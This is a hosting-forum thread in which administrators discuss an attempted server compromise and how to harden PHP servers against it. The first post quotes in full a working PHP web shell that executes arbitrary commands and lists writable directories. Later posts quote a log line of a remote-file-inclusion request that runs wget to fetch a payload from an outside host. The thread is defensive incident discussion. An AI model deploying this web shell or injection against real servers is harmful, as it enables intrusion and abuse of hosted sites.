Results 1 to 20 of 20

Thread: server hacked

  1. #1

    server hacked

    Among the man attempts to hack my server weekly I found this URL in my logs attempting to run a PHP script using some scripts on my server.

    thecurse.pop.com.br/cmd.txt

    It appears as though they are trying to expose writable directories on my clients domains and put the contents of those directories in an HTML <textarea> field. What the real purpouse is I don't know but I suspect it's not good. Last week Monday a hacker managed to send out thousands of phising spams to AOL accounts using old formmail scripts some of my clients were running on their sites. How they found out which domains had these scripts is unknown to me. I suspect I have a client on my server currently doing something they shouldn't be doing.

    In case they take down the domain here is the code:

    <?php
    function enviar($arquivo, $destino){
    $ea = @fopen($arquivo,"r");
    $ea2 = @fopen($destino,"w");
    fwrite($ea2, "");
    $ea2 = @fopen($destino,"a+");
    for(;{
    $read = @fread($ea, 8192);
    if(empty($read)) break;
    $ok = fwrite($ea2, $read);
    if(empty($ok)){ echo "<center>Erro</center>"; break; }
    if(!empty($ok)){ echo "<center>Arquivo Enviado</center>"; break; }}}
    ?>

    <p><center><h1><font color=#FF0000 face=Verdana><b>Infektion Group</b></font></h1>
    <b><font color=#FF0000 face=Verdana size=4>Executor de Comandos v4.6</font></br></p>

    <?
    closelog();
    $uid = posix_getuid();
    $gid = posix_getgid();
    if($chdir == "") $chdir = posix_getcwd();
    if(@is_writable($chdir)){ $perm = "sim"; } else { $perm = "nao"; }
    ?>

    <font color=#000000 face=verdana size=2>
    <?
    $uname = posix_uname();
    echo "<br>";
    while (list($info, $value) = each ($uname)) {
    echo "$value "; }
    echo "</br><br>uid=$uid gid=$gid</br>";
    echo "<br>Diretório Atual: $chdir</br>";
    echo "<br>Permissao de Escrita: $perm</br>";
    ?>

    <? if(isset($cmd)){ ?>
    </b></font><br><font face=verdana size=3 color=#FF0000>Comando</br>
    </font><font face=verdana size=2 color=#000000><textarea cols=75 rows=8>
    <?php
    if(isset($chdir)) @chdir($chdir);
    ob_start();
    passthru("$cmd 2>&1");
    $output = ob_get_contents();
    ob_end_clean();

    if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));

    ?>
    </TEXTAREA>
    <?php } ?>

    <? if(isset($listar)){ ?>
    <font face=verdana size=2 color=#000000><textarea cols=75 rows=8>
    <?
    if($dir = opendir($listar)){
    while (false !== ($arquivo = readdir($dir))){
    if($arquivo != "." && $arquivo != "..") {
    $arq = $listar.'/'.$arquivo;
    if(@is_writable($arq)){ echo "$arq\n"; }}}
    closedir($dir); }}
    ?>
    </textarea></font>

    <? if(isset($u)){ enviar($di, $de); } ?>

  2. #2
    Join Date
    Oct 2003
    Location
    Long Island, New York
    Posts
    220
    This is highly common... I run prelude/snort and pick these attacks up all the time. You should be prepared to defend yourself, because these types of attacks occur constantly.
    TWSites.com - Business Web Hosting Solutions & Server Management Since 2003

  3. #3
    install mod_sec... first.

    Run phpsuexec... Wont be able to execute things except with their user privileges.

    read about php security ( you should disable some functions... )

    There's a lot of tutorial on the net about php security ...

  4. #4
    This isn't a server hacking attempt and is isn't really that special. It's a spammer finding insecure scripts by scanning sites, just like they always do. It's also not related to formmail scripts, but more to insecure php scripts, most likely phpBB with that script. You need to find which of your clients has insecure installations. They probably don't even know their account is being used like this.

  5. #5
    Join Date
    Jan 2004
    Posts
    1,183
    This webpage (thecurse.pop.com.br) is being hosted in Brasil on a free webhosting service provide by the ISP.


    You should use a security layer to filter the bad codes and bug on scripts.


    Any way good luck.

    Don't forget to run rkhunter and chkrootkit to see if you where hackead on root

  6. #6
    Join Date
    Apr 2003
    Location
    NC
    Posts
    3,080
    As others have suggested a good mod_security ruleset will help block out stuff like this. Also setting wget to chmod 700 will block many of these problems, though now curl and other methods of downloading files are becoming popular.
    John W, CISSP, C|EH
    MS Information Security and Assurance
    ITEagleEye.com - Server Administration and Security
    Yawig.com - Managed VPS and Dedicated Servers with VIP Service

  7. #7
    wont that code help other peaple to hack peaple as well?

  8. #8
    Join Date
    Oct 2003
    Location
    Long Island, New York
    Posts
    220
    These attacks occur so often that if you simply keep a site on the internet and keep your eyes open you'll be hit eventually... I don't think there's any risk of publishing it, at least some people will know what we're dealing with.
    TWSites.com - Business Web Hosting Solutions & Server Management Since 2003

  9. #9

    What Now

    I was hacked yesterday by the Infektion Group. I have stopped several php functions but is there anything else I should do with the server.

  10. #10
    If you have access to php.ini, look up disable_function. Here, you can place all the functions you dont want PHP to be able to use.

    Hope this helps.
    PHP / MySQL Ecommerce programmer

  11. #11
    I did disable the exec and shell_exec and the like. I also chmod wget to 000 which may have some ill effects, not sure yet.

    I also located the script whcih caused this mess.

    200.209.52.2 - - [12/May/2005:13:00:23 -0400] "GET /images/title-htt%jipc%r%r/weather_old/cmd2.jpg?.jpg HTTP/1.0" 302 296 "htwww%%somesite%%com/pages.php?main=ht/jipc%r%kr/weather_old/cmd2.jpg?&cmd=cd%20/dev/shm;%20wget%20www%thecurse%pop%com%b/b/cgi%20-O%20httpd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; FDM)"

  12. #12
    Join Date
    Jun 2003
    Posts
    961
    Originally posted by tomham

    I also located the script whcih caused this mess.

    200.209.52.2 - - [12/May/2005:13:00:23 -0400] "GET /images/title-htt%jipc%r%r/weather_old/cmd2.jpg?.jpg HTTP/1.0" 302 296 "htwww%%somesite%%com/pages.php?main=ht/jipc%r%kr/weather_old/cmd2.jpg?&cmd=cd%20/dev/shm;%20wget%20www%thecurse%pop%com%b/b/cgi%20-O%20httpd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; FDM)"
    what is that scripts name? url?

  13. #13
    200.209.52.2 - - [12/May/2005:13:00:23 -0400] "GET /images/title-http://jipc.or.kr/weather_old/cmd2.jpg?.jpg HTTP/1.0" 302 296 "http://www.somehost.com/pages.php?area=http://jipc.or.kr/weather_old/cmd2.jpg?&cmd=cd%20/dev/shm;%20wget%20www.thecurse.pop.com.b/b/cgi%20-O%20httpd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; FDM)"

    This is from my logs I changed the domain obvoiously. But this is the injection script that was used. So hopefully this helps someone out.

  14. #14
    Join Date
    Dec 2001
    Location
    Netherlands
    Posts
    780
    Hi,

    What firewall are you using?

    If you are not using any firewalls at all, I would like you to try shorewall (though APF might also have this feature) and configure rules that will allow privledged outside connections only.

    A simple example is only root can initiate connections outside on port 20,21, 80, 110 and 443 and so on. Port 25 and 53 remaing open so that other proceses can query dns and send emails.

    If anyone tries to ftp/wget/curl/lynx/elinks/(a dozen other perl modules to help download) and a dozen more other commands, they are simply denied and the attempt logged.

    Cheers,
    Experienced OpenStack Admin For Hire
    regular as admin0 on freenode IRC on #openstack and #openstack-ansible channels

  15. #15
    Join Date
    Apr 2003
    Location
    NC
    Posts
    3,080
    The only bad thing about what admin0 suggested is that it will break some other scripts. I would be very careful when you start to block outgoing 80 because it will break websites that retrieve content from others. It is a great idea but I have found in general it usually causes more trouble then it is worth.
    John W, CISSP, C|EH
    MS Information Security and Assurance
    ITEagleEye.com - Server Administration and Security
    Yawig.com - Managed VPS and Dedicated Servers with VIP Service

  16. #16
    Join Date
    Jun 2003
    Posts
    961
    Originally posted by tomham
    200.209.52.2 - - [12/May/2005:13:00:23 -0400] "GET /images/title-http://jipc.or.kr/weather_old/cmd2.jpg?.jpg HTTP/1.0" 302 296 "http://www.somehost.com/pages.php?area=http://jipc.or.kr/weather_old/cmd2.jpg?&cmd=cd%20/dev/shm;%20wget%20www.thecurse.pop.com.b/b/cgi%20-O%20httpd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; FDM)"
    what script is that "pages.php"? public one?

  17. #17
    Join Date
    Sep 2002
    Location
    Top Secret
    Posts
    11,687
    I did disable the exec and shell_exec and the like.
    disabling exec and shell_exec is pretty extreme, and in many cases can cause bad things to happen, especially if you have other users on your server.
    Secure your code!!!!!!!!
    If you secure your code, this won't happen. Make sure that you have a default case for area and that it doesn't stray off, something like
    Code:
    default:
    main();
    break;
    would work, but you need to modify that to work with you code.
    This is THE most common cause of hacks, right here, insecure code allowing for vulnerabilities like this. Unfortunately, those producing this kind of code make it harder on everyone else to maintain a decent and secure server. Learn what you're doing, secure your code, before just sending it out there for the world to abuse, because, they WILL abuse it.
    WHMCS Guru - WHMCS addons, management, support and more.
    WHMCS Notifications Extended - Add slack, hipchat, SMS, pushover to WHMCS !!
    Always looking for Linux, WHMCS, Support Desk work. PM for details

  18. #18
    Join Date
    Jan 2002
    Posts
    269
    Originally posted by admin0
    Hi,
    example is only root can initiate connections outside on port 20,21, 80, 110 and 443 and so on. Port 25 and 53 remaing open so that other proceses can query dns and send emails.
    I'm trying to do that in APF.
    Are there other ports besides 20,21,80,110 and 443 to keep open for root on a cpanel server? I am thinking of 465,873 and 2089 for example.

    I would really appreciate if you could list all ports that need remain open for root only.

  19. #19
    Join Date
    Dec 2001
    Location
    Netherlands
    Posts
    780
    As eth00 showed a valid concern, it breaks scripts that get content from other websites, and that is the whole point. Block Everything, Open a selected only. Go ahead and block port 80, if a user complains he is not able to get news from google.com, open firewall for outgoing port 80 to news.google.com and so on. You can be then assured that using over two dozen applications(including perl modules), users can only get content of what you allow, and not download any hacks for other websites.


    I have been using the following ruleset for almost two dozen cpanel servers for almost 2 years, and without any issues.

    20 root
    21 root
    22 root
    25
    26
    37
    43
    53
    80 root
    113 root
    465
    443 root
    873 root
    2089 root
    3306

    Rest of outgoing connections are denied and logged.

    Cheers,
    Last edited by admin0; 05-15-2005 at 01:15 PM.
    Experienced OpenStack Admin For Hire
    regular as admin0 on freenode IRC on #openstack and #openstack-ansible channels

  20. #20
    Join Date
    Jan 2002
    Posts
    269
    Excellent, thanks admin0

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •